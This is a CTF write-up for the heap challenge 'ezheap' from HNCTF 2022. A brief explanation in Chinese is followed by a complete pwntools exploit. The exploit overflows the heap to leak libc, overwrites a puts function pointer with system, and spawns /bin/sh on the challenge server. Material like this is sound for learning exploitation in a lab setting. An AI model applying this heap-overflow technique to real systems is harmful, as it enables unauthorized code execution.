Problem: [HNCTF 2022 WEEK4]ezheap
思路
可以进行任意长度溢出
先利用溢出读到 chunk1 的指针值，再继续溢出泄露 libc 地址并算出 libc_base 与 system；随后把堆恢复成之前的样子，同时把 name 改成 /bin/sh，并把 puts 函数指针改成 system，这样 show 的时候就会直接执行 system("/bin/sh")。
EXP
from pwn import *
# Connection target and the local artefacts the script loads.
REMOTE_HOST = "node5.anna.nssctf.cn"
REMOTE_PORT = 27862
LIBC_PATH = '/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'

context.log_level = 'debug'  # echo every byte exchanged with the service while developing
p = remote(REMOTE_HOST, REMOTE_PORT)  # live instance; the local-process line is kept for offline runs
# p = process("./ezheap")
e = ELF('./ezheap')  # challenge binary; loaded here but not referenced further in this file
libc = ELF(LIBC_PATH)  # libc matching the remote (glibc 2.23), used only for symbol offsets
def new(idx, size, name, content):
    """Drive menu option 1 (``new``): create slot *idx* with *size*, *name* and *content*.

    Every answer is written only once its prompt has arrived, so the script
    stays in step with the program's menu.  Uses the module-level connection ``p``.
    """
    answers = (
        (b'Choice: \n', str(1)),
        (b'Input your idx:\n', str(idx)),
        (b'Size:\n', str(size)),
        (b'Name: \n', name),
        (b'Content:\n', content),
    )
    for prompt, reply in answers:
        p.sendafter(prompt, reply)
def free(idx):
    """Drive menu option 2 (``free``) for slot *idx* on the module-level connection ``p``."""
    choice = str(2)
    slot = str(idx)
    p.sendafter(b'Choice: \n', choice)
    p.sendafter(b'Input your idx:\n', slot)
def show(idx):
    """Drive menu option 3 (``show``) for slot *idx*.

    Only the menu answers are sent; whatever the program prints afterwards is
    left on the module-level connection ``p`` for the caller to read.
    """
    for prompt, reply in ((b'Choice: \n', str(3)), (b'Input your idx:\n', str(idx))):
        p.sendafter(prompt, reply)
def edit(idx, size, content):
    """Drive menu option 4 (``edit``): rewrite slot *idx* with *size* bytes of *content*.

    *size* is passed straight to the program; per the writeup the program does
    not bound it by the slot's allocation, which is the overflow the script relies
    on.  No prompt is awaited before *content* itself is sent.  Uses the
    module-level connection ``p``.
    """
    replies = [
        (b'Choice: \n', str(4)),
        (b'Input your idx:\n', str(idx)),
        (b'Size:\n', str(size)),
    ]
    for prompt, reply in replies:
        p.sendafter(prompt, reply)
    p.send(content)
# --- Stage 1: two adjacent 0x20-byte slots -------------------------------------
new(0, 0x20, b'qwq', b'a' * 0x20)
new(1, 0x20, b'qwq', b'a' * 0x20)  # 0x30+0x30: the two chunks sit back to back


def _leak_qword_after(fill):
    """Overflow slot 0 with *fill*, show it, and unpack the 6 bytes printed after it.

    The size handed to ``edit`` is the length of *fill*, so the write runs past
    slot 0's 0x20-byte content and ``show`` echoes what lies beyond it.
    """
    edit(0, len(fill), fill)
    show(0)
    p.recvuntil(fill)
    return u64(p.recv(6).ljust(8, b'\x00'))


# --- Stage 2: read past slot 0 --------------------------------------------------
# The writeup describes the first value as a chunk-1 pointer and the second as
# the puts address; the offsets (0x30 and 0x50) are the author's.
chunk_idx_1 = _leak_qword_after(b'a' * 0x30)
log.success(f"leak chunk_idx_1 =>{chunk_idx_1:#x}")
puts_addr = _leak_qword_after(b'a' * 0x50)
log.success(f"leak puts_addr =>{puts_addr:#x}")

libc_base = puts_addr - libc.sym["puts"]
log.success(f"leak libc_base =>{libc_base:#x}")
system_addr = libc_base + libc.sym["system"]

# --- Stage 3: restore what the overflows clobbered, swapping name and function --
payload = b''.join([
    b'a' * 0x20,             # slot 0 content, left as it was
    p64(0), p64(0x31),       # the next chunk's header, restored (writeup: "恢复堆成之前的样子")
    b'/bin/sh\x00', p64(0),  # name field replaced by "/bin/sh"
    p64(chunk_idx_1),        # pointer recovered in stage 2, written back unchanged
    p64(0x1),                # kept as the original script had it; meaning not described in the writeup
    p64(system_addr),        # function pointer: puts -> system
])
edit(0, len(payload), payload)
show(1)  # per the writeup, show on slot 1 now ends up in system("/bin/sh")
# attach(p)
p.interactive()